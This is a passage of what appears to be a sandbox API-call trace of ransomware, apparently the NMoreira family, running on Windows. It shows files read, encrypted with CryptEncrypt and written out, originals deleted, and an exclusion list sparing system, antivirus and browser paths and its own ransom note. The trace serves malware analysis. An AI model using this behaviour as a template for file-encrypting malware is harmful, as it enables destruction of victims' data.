hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.276] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.276] GetLastError () returned 0x0 [0166.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.277] GetLastError () returned 0x0 [0166.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.277] GetLastError () returned 0x0 [0166.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.277] GetLastError () returned 0x0 [0166.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.277] GetLastError () returned 0x0 [0166.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.277] GetLastError () returned 0x0 [0166.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.277] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.277] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.277] GetLastError () returned 0x0 [0166.277] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.278] GetLastError () returned 0x0 [0166.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.278] GetLastError () returned 0x0 [0166.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.278] GetLastError () returned 0x0 [0166.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.278] GetLastError () returned 0x0 [0166.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.278] GetLastError () returned 0x0 [0166.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.278] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.278] GetLastError () returned 0x0 [0166.278] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.278] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.279] GetLastError () returned 0x0 [0166.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.279] GetLastError () returned 0x0 [0166.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.279] GetLastError () returned 0x0 [0166.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.279] GetLastError () returned 0x0 [0166.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.279] GetLastError () returned 0x0 [0166.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.279] GetLastError () returned 0x0 [0166.279] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.279] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x51, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x51, lpOverlapped=0x0) returned 1 [0166.279] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x51, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x60) returned 1 [0166.279] GetLastError () returned 0x0 [0166.280] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x60, lpOverlapped=0x0) returned 1 [0166.280] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.280] WriteFile (in: hFile=0x15c4, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.280] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned 1 [0166.280] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg")) returned 0 [0166.280] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" [0166.280] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0166.280] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD09.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd09.tmp")) returned 0xfd09 [0166.281] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD09.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd09.tmp"), dwFlags=0x1) returned 0 [0166.281] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD09.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd09.tmp")) returned 1 [0166.282] CryptDestroyKey (hKey=0x9ad7f8) returned 1 [0166.282] wcslen (_String="OK") returned 0x2 [0166.282] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.282] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.282] CryptDestroyKey (hKey=0x9ad738) returned 1 [0166.282] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0166.282] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*NMCRYPT") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*Recovers your files.html") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*.exe") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*.dll") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*.lnk") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*.bat") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*.ini") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*.msi") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*.scf") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*pagefile.sys*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*NTUSER.DAT*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*AppData*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*\\winrar\\*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*\\java\\*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*\\TeamViewer\\*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*\\windows\\*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*\\ESET\\*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*\\AVG\\*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*\\AVIRA\\*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*\\AVAST Software\\*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*Atheros*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*Realtek*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*bootmgr*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*boot*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*boot*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*CONFIG.SYS*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*IO.SYS*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*MSDOS.SYS*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*NTDETECT.COM*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*ntldr*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*chrome*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*opera*") returned 0 [0166.282] PathMatchSpecW (pszFile="Stucco.gif", pszSpec="*firefox*") returned 0 [0166.283] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stucco.gif", pszSpec="*") returned 1 [0166.283] strlen (_Str="NMoreira") returned 0x8 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.283] CryptGenRandom 